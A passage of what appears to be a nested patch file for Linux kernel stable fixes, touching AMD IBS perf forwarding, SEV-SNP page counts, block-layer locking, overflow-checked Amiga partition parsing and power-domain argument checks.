+@@ -374,7 +374,7 @@ static int amd_pmu_hw_config(struct perf_event *event)
+ 
+ 	/* pass precise event sampling to ibs: */
+ 	if (event->attr.precise_ip && get_ibs_caps())
+-		return -ENOENT;
++		return forward_event_to_ibs(event);
+ 
+ 	if (has_branch_stack(event) && !x86_pmu.lbr_nr)
+ 		return -EOPNOTSUPP;
+diff --git a/arch/x86/events/amd/ibs.c b/arch/x86/events/amd/ibs.c
+index 4cb710efbdd9a..37cbbc5c659a5 100644
+--- a/arch/x86/events/amd/ibs.c
++++ b/arch/x86/events/amd/ibs.c
+@@ -190,7 +190,7 @@ static struct perf_ibs *get_ibs_pmu(int type)
+ }
+ 
+ /*
+- * Use IBS for precise event sampling:
++ * core pmu config -> IBS config
+  *
+  *  perf record -a -e cpu-cycles:p ...    # use ibs op counting cycle count
+  *  perf record -a -e r076:p ...          # same as -e cpu-cycles:p
+@@ -199,25 +199,9 @@ static struct perf_ibs *get_ibs_pmu(int type)
+  * IbsOpCntCtl (bit 19) of IBS Execution Control Register (IbsOpCtl,
+  * MSRC001_1033) is used to select either cycle or micro-ops counting
+  * mode.
+- *
+- * The rip of IBS samples has skid 0. Thus, IBS supports precise
+- * levels 1 and 2 and the PERF_EFLAGS_EXACT is set. In rare cases the
+- * rip is invalid when IBS was not able to record the rip correctly.
+- * We clear PERF_EFLAGS_EXACT and take the rip from pt_regs then.
+- *
+  */
+-static int perf_ibs_precise_event(struct perf_event *event, u64 *config)
++static int core_pmu_ibs_config(struct perf_event *event, u64 *config)
+ {
+-	switch (event->attr.precise_ip) {
+-	case 0:
+-		return -ENOENT;
+-	case 1:
+-	case 2:
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+ 	switch (event->attr.type) {
+ 	case PERF_TYPE_HARDWARE:
+ 		switch (event->attr.config) {
+@@ -243,22 +227,37 @@ static int perf_ibs_precise_event(struct perf_event *event, u64 *config)
+ 	return -EOPNOTSUPP;
+ }
+ 
++/*
++ * The rip of IBS samples has skid 0. Thus, IBS supports precise
++ * levels 1 and 2 and the PERF_EFLAGS_EXACT is set. In rare cases the
++ * rip is invalid when IBS was not able to record the rip correctly.
++ * We clear PERF_EFLAGS_EXACT and take the rip from pt_regs then.
++ */
++int forward_event_to_ibs(struct perf_event *event)
++{
++	u64 config = 0;
++
++	if (!event->attr.precise_ip || event->attr.precise_ip > 2)
++		return -EOPNOTSUPP;
++
++	if (!core_pmu_ibs_config(event, &config)) {
++		event->attr.type = perf_ibs_op.pmu.type;
++		event->attr.config = config;
++	}
++	return -ENOENT;
++}
++
+ static int perf_ibs_init(struct perf_event *event)
+ {
+ 	struct hw_perf_event *hwc = &event->hw;
+ 	struct perf_ibs *perf_ibs;
+ 	u64 max_cnt, config;
+-	int ret;
+ 
+ 	perf_ibs = get_ibs_pmu(event->attr.type);
+-	if (perf_ibs) {
+-		config = event->attr.config;
+-	} else {
+-		perf_ibs = &perf_ibs_op;
+-		ret = perf_ibs_precise_event(event, &config);
+-		if (ret)
+-			return ret;
+-	}
++	if (!perf_ibs)
++		return -ENOENT;
++
++	config = event->attr.config;
+ 
+ 	if (event->pmu != &perf_ibs->pmu)
+ 		return -ENOENT;
+diff --git a/arch/x86/include/asm/perf_event.h b/arch/x86/include/asm/perf_event.h
+index 5d0f6891ae611..4d810b9478a43 100644
+--- a/arch/x86/include/asm/perf_event.h
++++ b/arch/x86/include/asm/perf_event.h
+@@ -467,8 +467,10 @@ struct pebs_xmm {
+ 
+ #ifdef CONFIG_X86_LOCAL_APIC
+ extern u32 get_ibs_caps(void);
++extern int forward_event_to_ibs(struct perf_event *event);
+ #else
+ static inline u32 get_ibs_caps(void) { return 0; }
++static inline int forward_event_to_ibs(struct perf_event *event) { return -ENOENT; }
+ #endif
+ 
+ #ifdef CONFIG_PERF_EVENTS
+diff --git a/arch/x86/include/asm/pgtable_64.h b/arch/x86/include/asm/pgtable_64.h
+index e479491da8d51..07cd53eeec770 100644
+--- a/arch/x86/include/asm/pgtable_64.h
++++ b/arch/x86/include/asm/pgtable_64.h
+@@ -237,8 +237,8 @@ static inline void native_pgd_clear(pgd_t *pgd)
+ 
+ #define __pte_to_swp_entry(pte)		((swp_entry_t) { pte_val((pte)) })
+ #define __pmd_to_swp_entry(pmd)		((swp_entry_t) { pmd_val((pmd)) })
+-#define __swp_entry_to_pte(x)		((pte_t) { .pte = (x).val })
+-#define __swp_entry_to_pmd(x)		((pmd_t) { .pmd = (x).val })
++#define __swp_entry_to_pte(x)		(__pte((x).val))
++#define __swp_entry_to_pmd(x)		(__pmd((x).val))
+ 
+ extern int kern_addr_valid(unsigned long addr);
+ extern void cleanup_highmap(void);
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index ebc271bb6d8ed..a0a58c4122ec3 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -187,12 +187,12 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ }
+ void setup_ghcb(void);
+ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+-					 unsigned int npages);
++					 unsigned long npages);
+ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+-					unsigned int npages);
++					unsigned long npages);
+ void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op);
+-void snp_set_memory_shared(unsigned long vaddr, unsigned int npages);
+-void snp_set_memory_private(unsigned long vaddr, unsigned int npages);
++void snp_set_memory_shared(unsigned long vaddr, unsigned long npages);
++void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
+@@ -207,12 +207,12 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ static inline int rmpadjust(unsigned long vaddr, bool rmp_psize, unsigned long attrs) { return 0; }
+ static inline void setup_ghcb(void) { }
+ static inline void __init
+-early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr, unsigned int npages) { }
++early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+ static inline void __init
+-early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr, unsigned int npages) { }
++early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr, unsigned long npages) { }
+ static inline void __init snp_prep_memory(unsigned long paddr, unsigned int sz, enum psc_op op) { }
+-static inline void snp_set_memory_shared(unsigned long vaddr, unsigned int npages) { }
+-static inline void snp_set_memory_private(unsigned long vaddr, unsigned int npages) { }
++static inline void snp_set_memory_shared(unsigned long vaddr, unsigned long npages) { }
++static inline void snp_set_memory_private(unsigned long vaddr, unsigned long npages) { }
+ static inline void snp_set_wakeup_secondary_cpu(void) { }
+ static inline bool snp_init(struct boot_params *bp) { return false; }
+ static inline void snp_abort(void) { }
+diff --git a/arch/x86/include/asm/x86_init.h b/arch/x86/include/asm/x86_init.h
+index c1c8c581759d6..034e62838b284 100644
+--- a/arch/x86/include/asm/x86_init.h
++++ b/arch/x86/include/asm/x86_init.h
+@@ -150,7 +150,7 @@ struct x86_init_acpi {
+  * @enc_cache_flush_required	Returns true if a cache flush is needed before changing page encryption status
+  */
+ struct x86_guest {
+-	void (*enc_status_change_prepare)(unsigned long vaddr, int npages, bool enc);
++	bool (*enc_status_change_prepare)(unsigned long vaddr, int npages, bool enc);
+ 	bool (*enc_status_change_finish)(unsigned long vaddr, int npages, bool enc);
+ 	bool (*enc_tlb_flush_required)(bool enc);
+ 	bool (*enc_cache_flush_required)(void);
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index c7f1c7cb1963b..15ee89ce8c68c 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -731,11 +731,15 @@ unlock:
+ static void show_rdt_tasks(struct rdtgroup *r, struct seq_file *s)
+ {
+ 	struct task_struct *p, *t;
++	pid_t pid;
+ 
+ 	rcu_read_lock();
+ 	for_each_process_thread(p, t) {
+-		if (is_closid_match(t, r) || is_rmid_match(t, r))
+-			seq_printf(s, "%d\n", t->pid);
++		if (is_closid_match(t, r) || is_rmid_match(t, r)) {
++			pid = task_pid_vnr(t);
++			if (pid)
++				seq_printf(s, "%d\n", pid);
++		}
+ 	}
+ 	rcu_read_unlock();
+ }
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index c680ac6342bb3..afda719dd7253 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -643,7 +643,7 @@ static u64 __init get_jump_table_addr(void)
+ 	return ret;
+ }
+ 
+-static void pvalidate_pages(unsigned long vaddr, unsigned int npages, bool validate)
++static void pvalidate_pages(unsigned long vaddr, unsigned long npages, bool validate)
+ {
+ 	unsigned long vaddr_end;
+ 	int rc;
+@@ -660,7 +660,7 @@ static void pvalidate_pages(unsigned long vaddr, unsigned int npages, bool valid
+ 	}
+ }
+ 
+-static void __init early_set_pages_state(unsigned long paddr, unsigned int npages, enum psc_op op)
++static void __init early_set_pages_state(unsigned long paddr, unsigned long npages, enum psc_op op)
+ {
+ 	unsigned long paddr_end;
+ 	u64 val;
+@@ -699,7 +699,7 @@ e_term:
+ }
+ 
+ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+-					 unsigned int npages)
++					 unsigned long npages)
+ {
+ 	/*
+ 	 * This can be invoked in early boot while running identity mapped, so
+@@ -721,7 +721,7 @@ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long padd
+ }
+ 
+ void __init early_snp_set_memory_shared(unsigned long vaddr, unsigned long paddr,
+-					unsigned int npages)
++					unsigned long npages)
+ {
+ 	/*
+ 	 * This can be invoked in early boot while running identity mapped, so
+@@ -877,7 +877,7 @@ static void __set_pages_state(struct snp_psc_desc *data, unsigned long vaddr,
+ 		sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_PSC);
+ }
+ 
+-static void set_pages_state(unsigned long vaddr, unsigned int npages, int op)
++static void set_pages_state(unsigned long vaddr, unsigned long npages, int op)
+ {
+ 	unsigned long vaddr_end, next_vaddr;
+ 	struct snp_psc_desc *desc;
+@@ -902,7 +902,7 @@ static void set_pages_state(unsigned long vaddr, unsigned int npages, int op)
+ 	kfree(desc);
+ }
+ 
+-void snp_set_memory_shared(unsigned long vaddr, unsigned int npages)
++void snp_set_memory_shared(unsigned long vaddr, unsigned long npages)
+ {
+ 	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+ 		return;
+@@ -912,7 +912,7 @@ void snp_set_memory_shared(unsigned long vaddr, unsigned int npages)
+ 	set_pages_state(vaddr, npages, SNP_PAGE_STATE_SHARED);
+ }
+ 
+-void snp_set_memory_private(unsigned long vaddr, unsigned int npages)
++void snp_set_memory_private(unsigned long vaddr, unsigned long npages)
+ {
+ 	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+ 		return;
+diff --git a/arch/x86/kernel/x86_init.c b/arch/x86/kernel/x86_init.c
+index 10622cf2b30f4..41e5b4cb898c3 100644
+--- a/arch/x86/kernel/x86_init.c
++++ b/arch/x86/kernel/x86_init.c
+@@ -130,7 +130,7 @@ struct x86_cpuinit_ops x86_cpuinit = {
+ 
+ static void default_nmi_init(void) { };
+ 
+-static void enc_status_change_prepare_noop(unsigned long vaddr, int npages, bool enc) { }
++static bool enc_status_change_prepare_noop(unsigned long vaddr, int npages, bool enc) { return true; }
+ static bool enc_status_change_finish_noop(unsigned long vaddr, int npages, bool enc) { return false; }
+ static bool enc_tlb_flush_required_noop(bool enc) { return false; }
+ static bool enc_cache_flush_required_noop(void) { return false; }
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index 9c4d8dbcb1296..ff6c0462beee7 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -319,7 +319,7 @@ static void enc_dec_hypercall(unsigned long vaddr, int npages, bool enc)
+ #endif
+ }
+ 
+-static void amd_enc_status_change_prepare(unsigned long vaddr, int npages, bool enc)
++static bool amd_enc_status_change_prepare(unsigned long vaddr, int npages, bool enc)
+ {
+ 	/*
+ 	 * To maintain the security guarantees of SEV-SNP guests, make sure
+@@ -327,6 +327,8 @@ static void amd_enc_status_change_prepare(unsigned long vaddr, int npages, bool
+ 	 */
+ 	if (cc_platform_has(CC_ATTR_GUEST_SEV_SNP) && !enc)
+ 		snp_set_memory_shared(vaddr, npages);
++
++	return true;
+ }
+ 
+ /* Return true unconditionally: return value doesn't matter for the SEV side */
+diff --git a/arch/x86/mm/pat/set_memory.c b/arch/x86/mm/pat/set_memory.c
+index 2e5a045731dec..5f0ce77a259d8 100644
+--- a/arch/x86/mm/pat/set_memory.c
++++ b/arch/x86/mm/pat/set_memory.c
+@@ -2096,7 +2096,8 @@ static int __set_memory_enc_pgtable(unsigned long addr, int numpages, bool enc)
+ 		cpa_flush(&cpa, x86_platform.guest.enc_cache_flush_required());
+ 
+ 	/* Notify hypervisor that we are about to set/clr encryption attribute. */
+-	x86_platform.guest.enc_status_change_prepare(addr, numpages, enc);
++	if (!x86_platform.guest.enc_status_change_prepare(addr, numpages, enc))
++		return -EIO;
+ 
+ 	ret = __change_page_attr_set_clr(&cpa, 1);
+ 
+diff --git a/arch/x86/platform/efi/efi_64.c b/arch/x86/platform/efi/efi_64.c
+index b36596bf0fc38..601908bdbeadc 100644
+--- a/arch/x86/platform/efi/efi_64.c
++++ b/arch/x86/platform/efi/efi_64.c
+@@ -847,9 +847,9 @@ efi_set_virtual_address_map(unsigned long memory_map_size,
+ 
+ 	/* Disable interrupts around EFI calls: */
+ 	local_irq_save(flags);
+-	status = efi_call(efi.runtime->set_virtual_address_map,
+-			  memory_map_size, descriptor_size,
+-			  descriptor_version, virtual_map);
++	status = arch_efi_call_virt(efi.runtime, set_virtual_address_map,
++				    memory_map_size, descriptor_size,
++				    descriptor_version, virtual_map);
+ 	local_irq_restore(flags);
+ 
+ 	efi_fpu_end();
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 00d59d2288f00..7dd6a33e1d6a8 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -2437,6 +2437,7 @@ static u64 adjust_inuse_and_calc_cost(struct ioc_gq *iocg, u64 vtime,
+ 	u32 hwi, adj_step;
+ 	s64 margin;
+ 	u64 cost, new_inuse;
++	unsigned long flags;
+ 
+ 	current_hweight(iocg, NULL, &hwi);
+ 	old_hwi = hwi;
+@@ -2455,11 +2456,11 @@ static u64 adjust_inuse_and_calc_cost(struct ioc_gq *iocg, u64 vtime,
+ 	    iocg->inuse == iocg->active)
+ 		return cost;
+ 
+-	spin_lock_irq(&ioc->lock);
++	spin_lock_irqsave(&ioc->lock, flags);
+ 
+ 	/* we own inuse only when @iocg is in the normal active state */
+ 	if (iocg->abs_vdebt || list_empty(&iocg->active_list)) {
+-		spin_unlock_irq(&ioc->lock);
++		spin_unlock_irqrestore(&ioc->lock, flags);
+ 		return cost;
+ 	}
+ 
+@@ -2480,7 +2481,7 @@ static u64 adjust_inuse_and_calc_cost(struct ioc_gq *iocg, u64 vtime,
+ 	} while (time_after64(vtime + cost, now->vnow) &&
+ 		 iocg->inuse != iocg->active);
+ 
+-	spin_unlock_irq(&ioc->lock);
++	spin_unlock_irqrestore(&ioc->lock, flags);
+ 
+ 	TRACE_IOCG_PATH(inuse_adjust, iocg, now,
+ 			old_inuse, iocg->inuse, old_hwi, hwi);
+diff --git a/block/blk-mq-debugfs.c b/block/blk-mq-debugfs.c
+index bd942341b6382..7675e663df365 100644
+--- a/block/blk-mq-debugfs.c
++++ b/block/blk-mq-debugfs.c
+@@ -427,7 +427,7 @@ static void blk_mq_debugfs_tags_show(struct seq_file *m,
+ 	seq_printf(m, "nr_tags=%u\n", tags->nr_tags);
+ 	seq_printf(m, "nr_reserved_tags=%u\n", tags->nr_reserved_tags);
+ 	seq_printf(m, "active_queues=%d\n",
+-		   atomic_read(&tags->active_queues));
++		   READ_ONCE(tags->active_queues));
+ 
+ 	seq_puts(m, "\nbitmap_tags:\n");
+ 	sbitmap_queue_show(&tags->bitmap_tags, m);
+diff --git a/block/blk-mq-tag.c b/block/blk-mq-tag.c
+index a80d7c62bdfe6..100889c276c3f 100644
+--- a/block/blk-mq-tag.c
++++ b/block/blk-mq-tag.c
+@@ -40,6 +40,7 @@ static void blk_mq_update_wake_batch(struct blk_mq_tags *tags,
+ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ {
+ 	unsigned int users;
++	struct blk_mq_tags *tags = hctx->tags;
+ 
+ 	/*
+ 	 * calling test_bit() prior to test_and_set_bit() is intentional,
+@@ -57,9 +58,11 @@ void __blk_mq_tag_busy(struct blk_mq_hw_ctx *hctx)
+ 			return;
+ 	}
+ 
+-	users = atomic_inc_return(&hctx->tags->active_queues);
+-
+-	blk_mq_update_wake_batch(hctx->tags, users);
++	spin_lock_irq(&tags->lock);
++	users = tags->active_queues + 1;
++	WRITE_ONCE(tags->active_queues, users);
++	blk_mq_update_wake_batch(tags, users);
++	spin_unlock_irq(&tags->lock);
+ }
+ 
+ /*
+@@ -92,9 +95,11 @@ void __blk_mq_tag_idle(struct blk_mq_hw_ctx *hctx)
+ 			return;
+ 	}
+ 
+-	users = atomic_dec_return(&tags->active_queues);
+-
++	spin_lock_irq(&tags->lock);
++	users = tags->active_queues - 1;
++	WRITE_ONCE(tags->active_queues, users);
+ 	blk_mq_update_wake_batch(tags, users);
++	spin_unlock_irq(&tags->lock);
+ 
+ 	blk_mq_tag_wakeup_all(tags, false);
+ }
+diff --git a/block/blk-mq.h b/block/blk-mq.h
+index 0b2870839cdd6..c6eca452ea2a2 100644
+--- a/block/blk-mq.h
++++ b/block/blk-mq.h
+@@ -362,8 +362,7 @@ static inline bool hctx_may_queue(struct blk_mq_hw_ctx *hctx,
+ 			return true;
+ 	}
+ 
+-	users = atomic_read(&hctx->tags->active_queues);
+-
++	users = READ_ONCE(hctx->tags->active_queues);
+ 	if (!users)
+ 		return true;
+ 
+diff --git a/block/disk-events.c b/block/disk-events.c
+index aee25a7e1ab7d..450c2cbe23d56 100644
+--- a/block/disk-events.c
++++ b/block/disk-events.c
+@@ -307,6 +307,7 @@ bool disk_force_media_change(struct gendisk *disk, unsigned int events)
+ 	if (!(events & DISK_EVENT_MEDIA_CHANGE))
+ 		return false;
+ 
++	inc_diskseq(disk);
+ 	if (__invalidate_device(disk->part0, true))
+ 		pr_warn("VFS: busy inodes on changed media %s\n",
+ 			disk->disk_name);
+diff --git a/block/genhd.c b/block/genhd.c
+index 62a61388e752d..afab646d12c85 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -25,8 +25,9 @@
+ #include <linux/pm_runtime.h>
+ #include <linux/badblocks.h>
+ #include <linux/part_stat.h>
+-#include "blk-throttle.h"
++#include <linux/blktrace_api.h>
+ 
++#include "blk-throttle.h"
+ #include "blk.h"
+ #include "blk-mq-sched.h"
+ #include "blk-rq-qos.h"
+@@ -1181,6 +1182,8 @@ static void disk_release(struct device *dev)
+ 	might_sleep();
+ 	WARN_ON_ONCE(disk_live(disk));
+ 
++	blk_trace_remove(disk->queue);
++
+ 	/*
+ 	 * To undo the all initialization from blk_mq_init_allocated_queue in
+ 	 * case of a probe failure where add_disk is never called we have to
+diff --git a/block/partitions/amiga.c b/block/partitions/amiga.c
+index 5c8624e26a54c..5069210954129 100644
+--- a/block/partitions/amiga.c
++++ b/block/partitions/amiga.c
+@@ -11,10 +11,18 @@
+ #define pr_fmt(fmt) fmt
+ 
+ #include <linux/types.h>
++#include <linux/mm_types.h>
++#include <linux/overflow.h>
+ #include <linux/affs_hardblocks.h>
+ 
+ #include "check.h"
+ 
++/* magic offsets in partition DosEnvVec */
++#define NR_HD	3
++#define NR_SECT	5
++#define LO_CYL	9
++#define HI_CYL	10
++
+ static __inline__ u32
+ checksum_block(__be32 *m, int size)
+ {
+@@ -31,8 +39,12 @@ int amiga_partition(struct parsed_partitions *state)
+ 	unsigned char *data;
+ 	struct RigidDiskBlock *rdb;
+ 	struct PartitionBlock *pb;
+-	int start_sect, nr_sects, blk, part, res = 0;
+-	int blksize = 1;	/* Multiplier for disk block size */
++	u64 start_sect, nr_sects;
++	sector_t blk, end_sect;
++	u32 cylblk;		/* rdb_CylBlocks = nr_heads*sect_per_track */
++	u32 nr_hd, nr_sect, lo_cyl, hi_cyl;
++	int part, res = 0;
++	unsigned int blksize = 1;	/* Multiplier for disk block size */
+ 	int slot = 1;
+ 
+ 	for (blk = 0; ; blk++, put_dev_sector(sect)) {
+@@ -40,7 +52,7 @@ int amiga_partition(struct parsed_partitions *state)
+ 			goto rdb_done;
+ 		data = read_part_sector(state, blk, &sect);
+ 		if (!data) {
+-			pr_err("Dev %s: unable to read RDB block %d\n",
++			pr_err("Dev %s: unable to read RDB block %llu\n",
+ 			       state->disk->disk_name, blk);
+ 			res = -1;
+ 			goto rdb_done;
+@@ -57,12 +69,12 @@ int amiga_partition(struct parsed_partitions *state)
+ 		*(__be32 *)(data+0xdc) = 0;
+ 		if (checksum_block((__be32 *)data,
+ 				be32_to_cpu(rdb->rdb_SummedLongs) & 0x7F)==0) {
+-			pr_err("Trashed word at 0xd0 in block %d ignored in checksum calculation\n",
++			pr_err("Trashed word at 0xd0 in block %llu ignored in checksum calculation\n",
+ 			       blk);
+ 			break;
+ 		}
+ 
+-		pr_err("Dev %s: RDB in block %d has bad checksum\n",
++		pr_err("Dev %s: RDB in block %llu has bad checksum\n",
+ 		       state->disk->disk_name, blk);
+ 	}
+ 
+@@ -78,11 +90,16 @@ int amiga_partition(struct parsed_partitions *state)
+ 	}
+ 	blk = be32_to_cpu(rdb->rdb_PartitionList);
+ 	put_dev_sector(sect);
+-	for (part = 1; blk>0 && part<=16; part++, put_dev_sector(sect)) {
+-		blk *= blksize;	/* Read in terms partition table understands */
++	for (part = 1; (s32) blk>0 && part<=16; part++, put_dev_sector(sect)) {
++		/* Read in terms partition table understands */
++		if (check_mul_overflow(blk, (sector_t) blksize, &blk)) {
++			pr_err("Dev %s: overflow calculating partition block %llu! Skipping partitions %u and beyond\n",
++				state->disk->disk_name, blk, part);
++			break;
++		}
+ 		data = read_part_sector(state, blk, &sect);
+ 		if (!data) {
+-			pr_err("Dev %s: unable to read partition block %d\n",
++			pr_err("Dev %s: unable to read partition block %llu\n",
+ 			       state->disk->disk_name, blk);
+ 			res = -1;
+ 			goto rdb_done;
+@@ -94,19 +111,70 @@ int amiga_partition(struct parsed_partitions *state)
+ 		if (checksum_block((__be32 *)pb, be32_to_cpu(pb->pb_SummedLongs) & 0x7F) != 0 )
+ 			continue;
+ 
+-		/* Tell Kernel about it */
++		/* RDB gives us more than enough rope to hang ourselves with,
++		 * many times over (2^128 bytes if all fields max out).
++		 * Some careful checks are in order, so check for potential
++		 * overflows.
++		 * We are multiplying four 32 bit numbers to one sector_t!
++		 */
++
++		nr_hd   = be32_to_cpu(pb->pb_Environment[NR_HD]);
++		nr_sect = be32_to_cpu(pb->pb_Environment[NR_SECT]);
++
++		/* CylBlocks is total number of blocks per cylinder */
++		if (check_mul_overflow(nr_hd, nr_sect, &cylblk)) {
++			pr_err("Dev %s: heads*sects %u overflows u32, skipping partition!\n",
++				state->disk->disk_name, cylblk);
++			continue;
++		}
++
++		/* check for consistency with RDB defined CylBlocks */
++		if (cylblk > be32_to_cpu(rdb->rdb_CylBlocks)) {
++			pr_warn("Dev %s: cylblk %u > rdb_CylBlocks %u!\n",
++				state->disk->disk_name, cylblk,
++				be32_to_cpu(rdb->rdb_CylBlocks));
++		}
++
++		/* RDB allows for variable logical block size -
++		 * normalize to 512 byte blocks and check result.
++		 */
++
++		if (check_mul_overflow(cylblk, blksize, &cylblk)) {
++			pr_err("Dev %s: partition %u bytes per cyl. overflows u32, skipping partition!\n",
++				state->disk->disk_name, part);
++			continue;
++		}
++
++		/* Calculate partition start and end. Limit of 32 bit on cylblk
++		 * guarantees no overflow occurs if LBD support is enabled.
++		 */
++
++		lo_cyl = be32_to_cpu(pb->pb_Environment[LO_CYL]);
++		start_sect = ((u64) lo_cyl * cylblk);
++
++		hi_cyl = be32_to_cpu(pb->pb_Environment[HI_CYL]);
++		nr_sects = (((u64) hi_cyl - lo_cyl + 1) * cylblk);
+ 
+-		nr_sects = (be32_to_cpu(pb->pb_Environment[10]) + 1 -
+-			    be32_to_cpu(pb->pb_Environment[9])) *
+-			   be32_to_cpu(pb->pb_Environment[3]) *
+-			   be32_to_cpu(pb->pb_Environment[5]) *
+-			   blksize;
+ 		if (!nr_sects)
+ 			continue;
+-		start_sect = be32_to_cpu(pb->pb_Environment[9]) *
+-			     be32_to_cpu(pb->pb_Environment[3]) *
+-			     be32_to_cpu(pb->pb_Environment[5]) *
+-			     blksize;
++
++		/* Warn user if partition end overflows u32 (AmigaDOS limit) */
++
++		if ((start_sect + nr_sects) > UINT_MAX) {
++			pr_warn("Dev %s: partition %u (%llu-%llu) needs 64 bit device support!\n",
++				state->disk->disk_name, part,
++				start_sect, start_sect + nr_sects);
++		}
++
++		if (check_add_overflow(start_sect, nr_sects, &end_sect)) {
++			pr_err("Dev %s: partition %u (%llu-%llu) needs LBD device support, skipping partition!\n",
++				state->disk->disk_name, part,
++				start_sect, end_sect);
++			continue;
++		}
++
++		/* Tell Kernel about it */
++
+ 		put_partition(state,slot++,start_sect,nr_sects);
+ 		{
+ 			/* Be even more informative to aid mounting */
+diff --git a/crypto/jitterentropy.c b/crypto/jitterentropy.c
+index 22f48bf4c6f57..227cedfa4f0ae 100644
+--- a/crypto/jitterentropy.c
++++ b/crypto/jitterentropy.c
+@@ -117,7 +117,6 @@ struct rand_data {
+ 				   * zero). */
+ #define JENT_ESTUCK		8 /* Too many stuck results during init. */
+ #define JENT_EHEALTH		9 /* Health test failed during initialization */
+-#define JENT_ERCT		10 /* RCT failed during initialization */
+ 
+ /*
+  * The output n bits can receive more than n bits of min entropy, of course,
+@@ -762,14 +761,12 @@ int jent_entropy_init(void)
+ 			if ((nonstuck % JENT_APT_WINDOW_SIZE) == 0) {
+ 				jent_apt_reset(&ec,
+ 					       delta & JENT_APT_WORD_MASK);
+-				if (jent_health_failure(&ec))
+-					return JENT_EHEALTH;
+ 			}
+ 		}
+ 
+-		/* Validate RCT */
+-		if (jent_rct_failure(&ec))
+-			return JENT_ERCT;
++		/* Validate health test result */
++		if (jent_health_failure(&ec))
++			return JENT_EHEALTH;
+ 
+ 		/* test whether we have an increasing timer */
+ 		if (!(time2 > time))
+diff --git a/drivers/base/power/domain.c b/drivers/base/power/domain.c
+index b411201f75bfb..56ceba4698024 100644
+--- a/drivers/base/power/domain.c
++++ b/drivers/base/power/domain.c
+@@ -1624,9 +1624,6 @@ static int genpd_add_device(struct generic_pm_domain *genpd, struct device *dev,
+ 
+ 	dev_dbg(dev, "%s()\n", __func__);
+ 
+-	if (IS_ERR_OR_NULL(genpd) || IS_ERR_OR_NULL(dev))
+-		return -EINVAL;
+-
+ 	gpd_data = genpd_alloc_dev_data(dev, gd);
+ 	if (IS_ERR(gpd_data))
+ 		return PTR_ERR(gpd_data);
+@@ -1668,6 +1665,9 @@ int pm_genpd_add_device(struct generic_pm_domain *genpd, struct device *dev)
+ {
+ 	int ret;
+ 
++	if (!genpd || !dev)
++		return -EINVAL;
++
+ 	mutex_lock(&gpd_list_lock);
+ 	ret = genpd_add_device(genpd, dev, dev);
+ 	mutex_unlock(&gpd_list_lock);
+@@ -2514,6 +2514,9 @@ int of_genpd_add_device(struct of_phandle_args *genpdspec, struct device *dev)
+ 	struct generic_pm_domain *genpd;
+ 	int ret;
+ 
++	if (!dev)
++		return -EINVAL;
++
+ 	mutex_lock(&gpd_list_lock);
+ 
+ 	genpd = genpd_get_from_provider(genpdspec);
+@@ -2923,10 +2926,10 @@ static int genpd_parse_state(struct genpd_power_state *genpd_state,
+ 
+ 	err = of_property_read_u32(state_node, "min-residency-us", &residency);
+ 	if (!err)
+-		genpd_state->residency_ns = 1000 * residency;
++		genpd_state->residency_ns = 1000LL * residency;
+ 
+-	genpd_state->power_on_latency_ns = 1000 * exit_latency;
+-	genpd_state->power_off_latency_ns = 1000 * entry_latency;
++	genpd_state->power_on_latency_ns = 1000LL * exit_latency;
++	genpd_state->power_off_latency_ns = 1000LL * entry_latency;
+ 	genpd_state->fwnode = &state_node->fwnode;
+ 
+ 	return 0;
+diff --git a/drivers/base/property.c b/drivers/base/property.c
+index 7f338cb4fb7b8..b0c40d9734847 100644
+--- a/drivers/base/property.c
++++ b/drivers/base/property.c
+@@ -30,6 +30,8 @@ EXPORT_SYMBOL_GPL(dev_fwnode);
+  * @propname: Name of the property
+  *
+  * Check if property @propname is present in the device firmware description.
++ *
++ * Return: true if property @propname is present. Otherwise, returns false.
+  */
+ bool device_property_present(struct device *dev, const char *propname)
+ {
+@@ -41,6 +43,8 @@ EXPORT_SYMBOL_GPL(device_property_present);
+  * fwnode_property_present - check if a property of a firmware node is present
+  * @fwnode: Firmware node whose property to check
+  * @propname: Name of the property
++ *
++ * Return: true if property @propname is present. Otherwise, returns false.
+  */
+ bool fwnode_property_present(const struct fwnode_handle *fwnode,
+ 			     const char *propname)
+@@ -500,10 +504,10 @@ EXPORT_SYMBOL_GPL(fwnode_property_match_string);
+  * Obtain a reference based on a named property in an fwnode, with
+  * integer arguments.
+  *
+- * Caller is responsible to call fwnode_handle_put() on the returned
+- * args->fwnode pointer.
